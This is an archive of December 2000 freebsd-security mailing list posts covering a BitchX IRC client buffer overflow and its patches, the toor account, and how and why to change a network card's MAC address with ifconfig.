From owner-freebsd-security Sun Dec 10 4:37: 5 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 04:37:04 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id C14D237B400 for ; Sun, 10 Dec 2000 04:37:02 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 1455io-0008AV-00; Sun, 10 Dec 2000 14:36:54 +0200 Date: Sun, 10 Dec 2000 14:36:54 +0200 (IST) From: Roman Shterenzon To: Cc: Subject: Buffer vulnerability in BitchX irc client Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Aparently securityfocus has some information about this: http://www.securityfocus.com/bid/2087 There are some explanations in the helot.c - the exploit. P.S. Maintainer, can you hear me? :) --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 5:43: 5 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 05:43:03 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bilver.wjv.com (dhcp-1-213.n01.orldfl01.us.ra.verio.net [157.238.210.213]) by hub.freebsd.org (Postfix) with ESMTP id CD14237B401 for ; Sun, 10 Dec 2000 05:43:01 -0800 (PST) Received: (from bill@localhost) by bilver.wjv.com (8.9.3/8.9.3) id IAA27414 for freebsd-security@freebsd.org; Sun, 10 Dec 2000 08:40:19 -0500 (EST) (envelope-from bill) Date: Sun, 10 Dec 2000 08:40:11 -0500 From: Bill Vermillion To: freebsd-security@freebsd.org Subject: Re: security-digest V4 #824 Message-ID: <20001210084011.B27198@wjv.com> Reply-To: bv@bilver.wjv.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from owner-freebsd-security-digest@FreeBSD.ORG on Sat, Dec 09, 2000 at 11:36:08PM -0800 Organization: W.J.Vermillion / Orlando - Winter Park Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Dec 09, 2000 at 11:36:08PM -0800, security-digest thus spoke: > ------------------------------ > Date: Fri, 8 Dec 2000 10:04:51 -0500 (Eastern Standard Time) > From: Forrest Houston > Subject: RE: toor account > Personally I've found the toor account helpful on "shared" > machines. So if there a group that has primary sysadmin > responsibility for the machine they get the root password. > However as the network admin there might be times things need to > change/fix something so the netadmin has the toor password. That > way each group can use their own password schemes, which will also > hopefully eliminate the need for password lists. I'd say that buys you absolutely nothing except a false sense of security. The user ID and group ID of root and toor are identical. Same account with two names. All anyone with the toor account has to do is type passwd toor and they can change it. Really only good - in my view [which may be a very limited view] for something that needs to be run under Bourne shell syntax instead of csh without spawning a new shell. Since I'm an Bourne shell user from systems of long ago that had no c-shell for them, I used the Korn shell for root. -- Bill Vermillion - bv @ wjv . com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 8:21:16 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 08:21:14 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from 214.norrgarden.se (214.norrgarden.se [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id AA4E637B400 for ; Sun, 10 Dec 2000 08:21:12 -0800 (PST) Received: (from cj@localhost) by 214.norrgarden.se (8.11.1/8.11.1) id eBAGKq500447; Sun, 10 Dec 2000 17:20:52 +0100 (CET) (envelope-from cj) From: Carl Johan Madestrand Date: Sun, 10 Dec 2000 17:20:51 +0100 X-Mailer: KMail [version 1.1.99] Content-Type: text/plain; charset="US-ASCII" Cc: To: Roman Shterenzon , References: In-Reply-To: Subject: Re: Buffer vulnerability in BitchX irc client MIME-Version: 1.0 Message-Id: <00121017205100.00265@214.norrgarden.se> Content-Transfer-Encoding: 8bit Sender: cj@214.norrgarden.se Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sunday 10 December 2000 13:36, Roman Shterenzon wrote: > Hi, > Aparently securityfocus has some information about this: > http://www.securityfocus.com/bid/2087 > > There are some explanations in the helot.c - the exploit. > > P.S. Maintainer, can you hear me? :) > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] I hear you. I received a patch for misc.c today from someone which apparently is supposed to fix the problem. -- Carl Johan Madestrand LoRd_CJ on IRC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 9:49:55 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 09:49:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from venus.terahertz.net (venus.terahertz.net [208.137.7.240]) by hub.freebsd.org (Postfix) with ESMTP id 71D8C37B400 for ; Sun, 10 Dec 2000 09:49:52 -0800 (PST) Received: from localhost (sideshow@localhost) by venus.terahertz.net (8.9.3/8.9.3) with ESMTP id LAA73013; Sun, 10 Dec 2000 11:42:48 -0600 (CST) Date: Sun, 10 Dec 2000 11:42:47 -0600 (CST) From: Matt Watson To: Roman Shterenzon Cc: freebsd-security@FreeBSD.ORG, cj@vallcom.net Subject: Re: Buffer vulnerability in BitchX irc client In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This bug is already known to the bitchx coders and has already been patched in the CVS. Shortly i will be posting the patches for 75p3 and 1.0c17 on www.bitchx.org and ftp.bitchx.org as soon as i get my hands on them. I'm not the maintainers of the port but I do run the bitchx.org sites, so, should the port be downloading from ftp.bitchx.org there will be no need to include a special patch in the port. -- Matt Watson TeraHertz Communications On Sun, 10 Dec 2000, Roman Shterenzon wrote: > Hi, > Aparently securityfocus has some information about this: > http://www.securityfocus.com/bid/2087 > > There are some explanations in the helot.c - the exploit. > > P.S. Maintainer, can you hear me? :) > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 17:55:54 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 17:55:51 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from master.mddsg.com (cc721767-a.hwrd1.md.home.com [24.180.128.61]) by hub.freebsd.org (Postfix) with ESMTP id 0683437B400 for ; Sun, 10 Dec 2000 17:55:51 -0800 (PST) Received: from galifrey (dyn4 [192.168.2.204]) by master.mddsg.com (8.9.3/8.9.3) with SMTP id UAA24480 for ; Sun, 10 Dec 2000 20:55:49 -0500 (EST) (envelope-from erickson@mddsg.com) Message-ID: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> From: "David Erickson" To: Subject: MAC Address Date: Sun, 10 Dec 2000 20:56:03 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is it possible to change the MAC address on a NIC through ifconfig or any other means or do I have to get a specific NIC that supports this functionality? Dave Erickson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20: 2:36 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:02:34 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id C95C037B400 for ; Sun, 10 Dec 2000 20:02:33 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id UAA22299; Sun, 10 Dec 2000 20:03:40 -0800 Date: Sun, 10 Dec 2000 20:03:40 -0800 From: kris@citusc.usc.edu To: Matt Watson Cc: Roman Shterenzon , freebsd-security@FreeBSD.ORG, cj@vallcom.net Subject: Re: Buffer vulnerability in BitchX irc client Message-ID: <20001210200340.D22065@citusc.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from sideshow@terahertz.net on Sun, Dec 10, 2000 at 11:42:47AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Dec 10, 2000 at 11:42:47AM -0600, Matt Watson wrote: > This bug is already known to the bitchx coders and has already been > patched in the CVS. Shortly i will be posting the patches for 75p3 and > 1.0c17 on www.bitchx.org and ftp.bitchx.org as soon as i get my hands on > them. I'm not the maintainers of the port but I do run the bitchx.org > sites, so, should the port be downloading from ftp.bitchx.org there will > be no need to include a special patch in the port. Please don't modify an already released version without changing the version number - it will change the MD5 checksum for a start, so the port will no longer build, and makes more work for port maintainers when they have to go into the distfile and compare it with the old version to find out what changed. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20: 9: 4 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:09:02 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id 788E037B400 for ; Sun, 10 Dec 2000 20:09:01 -0800 (PST) Received: from localhost (mitayai@localhost) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id eBB48lk95850; Sun, 10 Dec 2000 23:08:48 -0500 (EST) (envelope-from mitayai@dreaming.org) Date: Sun, 10 Dec 2000 23:08:47 -0500 (EST) From: Will Mitayai Keeso Rowe To: David Erickson Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dave, I'm sure you could work it out, but i'm curious as why you would want to do this? A MAC address provides a necessary function in it's sequences of set prefixes and it's sequence of unique suffixes. -Mit --- Will Mitayai Keeso Rowe Toronto, Ontario, Canada mitayai@dreaming.org On Sun, 10 Dec 2000, David Erickson wrote: > Is it possible to change the MAC address on a NIC through ifconfig or any > other means or do I have to get a specific NIC that supports this > functionality? > > Dave Erickson > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:14:16 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:14:13 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id D115B37B400 for ; Sun, 10 Dec 2000 20:14:12 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id XAA03856; Sun, 10 Dec 2000 23:14:02 -0500 Date: Sun, 10 Dec 2000 23:14:02 -0500 (EST) From: Mikhail Kruk To: Will Mitayai Keeso Rowe Cc: David Erickson , Subject: Re: MAC Address In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'd want to do it because at our university there are plugs for laptops on DHCP network, but DHCP server knows everyone's MAC address so all my activity is logged when I use it. Changing my MAC address would open some interesting posiblities. From a purely theoretical point of view, of course. > Dave, > > I'm sure you could work it out, but i'm curious as why you would want > to do this? A MAC address provides a necessary function in it's sequences > of set prefixes and it's sequence of unique suffixes. > > -Mit > > > --- > Will Mitayai Keeso Rowe > Toronto, Ontario, Canada > mitayai@dreaming.org > > On Sun, 10 Dec 2000, David Erickson wrote: > > > Is it possible to change the MAC address on a NIC through ifconfig or any > > other means or do I have to get a specific NIC that supports this > > functionality? > > > > Dave Erickson > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:16:56 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:16:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from sr14.nsw-remote.bigpond.net.au (sr14.nsw-remote.bigpond.net.au [24.192.3.29]) by hub.freebsd.org (Postfix) with ESMTP id 7C6D737B401 for ; Sun, 10 Dec 2000 20:16:51 -0800 (PST) Received: from fulton.net.au (CPE-144-132-180-48.nsw.bigpond.net.au [144.132.180.48]) by sr14.nsw-remote.bigpond.net.au (Pro-8.9.3/8.9.3) with SMTP id PAA13793; Mon, 11 Dec 2000 15:16:45 +1100 (EDT) Received: from plasmo ([203.53.147.231]) by fulton.net.au (8.11.1/8.11.1) with SMTP id eBB4GgN05835; Mon, 11 Dec 2000 15:16:42 +1100 (EST) (envelope-from jefff@fulton.net.au) Message-ID: <01ee01c0632a$bdffad40$9214a8c0@plasmo> From: "Jeff Fulton" To: "Will Mitayai Keeso Rowe" , "David Erickson" Cc: References: Subject: Re: MAC Address Date: Mon, 11 Dec 2000 15:27:57 +1100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe to masquerade as another address to fool a dhcp server or even a license server. Some of the cable networks register your mac address and won't allow you to connect from a different address, unless you call them up and ask to get it changed. There have also been a few nasty manufacturing events over the years when a whole batch of cards got sent out all with identical mac addresses. Regards, Jeff Fulton ----- Original Message ----- From: "Will Mitayai Keeso Rowe" To: "David Erickson" Cc: Sent: Monday, December 11, 2000 3:08 PM Subject: Re: MAC Address > Dave, > > I'm sure you could work it out, but i'm curious as why you would want > to do this? A MAC address provides a necessary function in it's sequences > of set prefixes and it's sequence of unique suffixes. > > -Mit > > > --- > Will Mitayai Keeso Rowe > Toronto, Ontario, Canada > mitayai@dreaming.org > > On Sun, 10 Dec 2000, David Erickson wrote: > > > Is it possible to change the MAC address on a NIC through ifconfig or any > > other means or do I have to get a specific NIC that supports this > > functionality? > > > > Dave Erickson > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:17:59 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:17:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id DF9C437B400 for ; Sun, 10 Dec 2000 20:17:55 -0800 (PST) Received: (qmail 8567 invoked by uid 1000); 11 Dec 2000 04:17:49 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Dec 2000 04:17:49 -0000 Date: Sun, 10 Dec 2000 22:17:48 -0600 (CST) From: Mike Silbersack To: David Erickson Cc: freebsd-security@freebsd.org Subject: Re: MAC Address In-Reply-To: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 10 Dec 2000, David Erickson wrote: > Is it possible to change the MAC address on a NIC through ifconfig or any > other means or do I have to get a specific NIC that supports this > functionality? > > Dave Erickson Someone had written a utility called setmac which used a KLD and utility program to do this under freebsd 3.x. I used it for a little while last year, and it worked well. You should be able to find it by doing a search of the mailing lists. (If the search engine's working. If you can't find it, e-mail me and I'll see if I still have it sitting around.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:22:35 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:22:33 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 3A54437B400 for ; Sun, 10 Dec 2000 20:22:30 -0800 (PST) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id PAA61828 for ; Mon, 11 Dec 2000 15:22:27 +1100 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id PAA23401; Mon, 11 Dec 2000 15:22:26 +1100 (EST) Message-Id: <200012110422.PAA23401@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: Your message of "Sun, 10 Dec 2000 22:17:48 MDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 11 Dec 2000 15:22:26 +1100 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Someone had written a utility called setmac which used a KLD and utility > program to do this under freebsd 3.x. I used it for a little while > last year, and it worked well. You should be able to find it by doing a > search of the mailing lists. (If the search engine's working. If you > can't find it, e-mail me and I'll see if I still have it sitting around.) Or if you're on 4.2 or later you could use: ifconfig ether lladdr where you replace the and with your information. Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:27:35 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:27:34 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail1.enter.net (mail1.enter.net [63.65.0.21]) by hub.freebsd.org (Postfix) with ESMTP id 8793D37B400 for ; Sun, 10 Dec 2000 20:27:32 -0800 (PST) Received: from enter.net (bsder.enter.net [63.94.128.138]) by mail1.enter.net (8.11.0/8.11.0) with ESMTP id eBB4RM407837 for ; Sun, 10 Dec 2000 23:27:22 -0500 Sender: dh@mail1.enter.net Message-ID: <3A3457AA.7507D386@enter.net> Date: Sun, 10 Dec 2000 23:27:22 -0500 From: Daniel Hauer X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.17-21mdk i586) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: MAC Address References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mikhail Kruk wrote: > > I'd want to do it because at our university there are plugs for laptops on > DHCP network, but DHCP server knows everyone's MAC address so all my > activity is logged when I use it. Changing my MAC address would open some > interesting posiblities. > >From a purely theoretical point of view, of course. > > > Dave, Sounds to me all this is just_slightly_unethical_if _not_bordering_on_illegal. This is a topic for a security mailing list? I thought we were here to boost network security, not circumvent it. Just a network technician's opinion. -- Regards, Daniel Hauer. http://www.enter.net "The Road To The Internet Starts There!" *************************************************************************** Windoze is for GAMES, UNIX is for the rest of us. UNIX is like the sights on a loaded gun. If you aim the gun at your foot and pull the trigger, it is the basic function of UNIX to accurately deliver the bullet from the gun to the target. In this case, it's your foot. *************************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:28: 4 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:28:02 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 1F68937B400 for ; Sun, 10 Dec 2000 20:28:01 -0800 (PST) Received: (qmail 20405 invoked from network); 11 Dec 2000 04:19:55 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 11 Dec 2000 04:19:55 -0000 Date: Mon, 11 Dec 2000 13:20:26 +0900 (JST) Message-Id: <20001211.132026.92582183.sen_ml@eccosys.com> To: mitayai@dreaming.org Cc: erickson@mddsg.com, freebsd-security@FreeBSD.ORG Subject: Re: MAC Address From: sen_ml@eccosys.com In-Reply-To: References: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> X-Mailer: Mew version 1.95b86 on Emacs 20.7 / Mule 4.0 (HANANOEN) X-cite-me: =?iso-2022-jp?B?GyRCJDskcxsoQg==?= Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Will Mitayai Keeso Rowe Subject: Re: MAC Address Date: Sun, 10 Dec 2000 23:08:47 -0500 (EST) > I'm sure you could work it out, but i'm curious as why you would want > to do this? A MAC address provides a necessary function in it's sequences > of set prefixes and it's sequence of unique suffixes. well, i'd want to do it so that my mac address doesn't leak when using implementations of ipv6 -- afaict, "privacy-considering" address allocation hasn't been implemented widely (perhaps because it's still in draft form?). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:34:16 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:34:14 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 6F29537B400 for ; Sun, 10 Dec 2000 20:34:14 -0800 (PST) Received: from pir by moek.pir.net with local (Exim) id 145KfA-0003cy-00 for freebsd-security@freebsd.org; Sun, 10 Dec 2000 23:34:08 -0500 Date: Sun, 10 Dec 2000 23:34:07 -0500 From: Peter Radcliffe To: freebsd-security@freebsd.org Subject: Re: MAC Address Message-ID: <20001210233407.C9158@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org References: <3A3457AA.7507D386@enter.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A3457AA.7507D386@enter.net>; from dh@enter.net on Sun, Dec 10, 2000 at 11:27:22PM -0500 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Daniel Hauer probably said: > Sounds to me all this is just_slightly_unethical_if > _not_bordering_on_illegal. This is a topic for a security mailing list? > I thought we were here to boost network security, not circumvent it. > Just a network technician's opinion. Several OSes allow you to change the ethernet address, and there are several legitimate reasons for needing to. It's a feature I use in testing, to fix broken cards, use "virtual" mac addresses (especially useful for cable modem companies that charge money to change the registered mac address), etc. It's a question for -questions, but it's already been answered here (an option to ifconfig in 4.*). Can we drop it now ? P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:34:23 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:34:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 7BADB37B400 for ; Sun, 10 Dec 2000 20:34:20 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id XAA03912; Sun, 10 Dec 2000 23:34:16 -0500 Date: Sun, 10 Dec 2000 23:34:16 -0500 (EST) From: Mikhail Kruk To: Daniel Hauer Cc: Subject: Re: MAC Address In-Reply-To: <3A3457AA.7507D386@enter.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Mikhail Kruk wrote: > > > > I'd want to do it because at our university there are plugs for laptops on > > DHCP network, but DHCP server knows everyone's MAC address so all my > > activity is logged when I use it. Changing my MAC address would open some > > interesting posiblities. > > >From a purely theoretical point of view, of course. > > > > > Dave, > > > Sounds to me all this is just_slightly_unethical_if > _not_bordering_on_illegal. This is a topic for a security mailing list? > I thought we were here to boost network security, not circumvent it. > Just a network technician's opinion. I said "purely theoretical" and I meant it. However I'm seriously confused now. Is it really possible to change MAC address from software as people say here? Isn't the whole point of MAC address just the oposite? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:36:11 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:36:09 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 828A937B400 for ; Sun, 10 Dec 2000 20:36:09 -0800 (PST) Received: (qmail 8624 invoked by uid 1000); 11 Dec 2000 04:36:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Dec 2000 04:36:05 -0000 Date: Sun, 10 Dec 2000 22:36:05 -0600 (CST) From: Mike Silbersack To: Tony Landells Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: <200012110422.PAA23401@tungsten.austclear.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 11 Dec 2000, Tony Landells wrote: > Or if you're on 4.2 or later you could use: > > ifconfig ether lladdr > > where you replace the and with your information. > > Tony Ah, neat. That'll be a nice timesaver if I need to change MAC addresses again. Thanks, Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 20:55:31 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 20:55:30 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 13D5837B400 for ; Sun, 10 Dec 2000 20:55:30 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 47E962B28F; Sun, 10 Dec 2000 22:55:29 -0600 (CST) Date: Sun, 10 Dec 2000 22:55:29 -0600 From: Bill Fumerola To: Daniel Hauer Cc: freebsd-security@freebsd.org Subject: Re: MAC Address Message-ID: <20001210225529.N86825@elvis.mu.org> References: <3A3457AA.7507D386@enter.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A3457AA.7507D386@enter.net>; from dh@enter.net on Sun, Dec 10, 2000 at 11:27:22PM -0500 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386 Sender: billf@elvis.mu.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Dec 10, 2000 at 11:27:22PM -0500, Daniel Hauer wrote: > Sounds to me all this is just_slightly_unethical_if > _not_bordering_on_illegal. This is a topic for a security mailing list? > I thought we were here to boost network security, not circumvent it. > Just a network technician's opinion. Most of the time discussions on how to circumvent security result in better ways to boost it. -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Dec 10 21: 8: 0 2000 From owner-freebsd-security@FreeBSD.ORG Sun Dec 10 21:07:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id B3CA937B400 for ; Sun, 10 Dec 2000 21:07:57 -0800 (PST) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 10 Dec 2000 21:06:18 -0800 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com 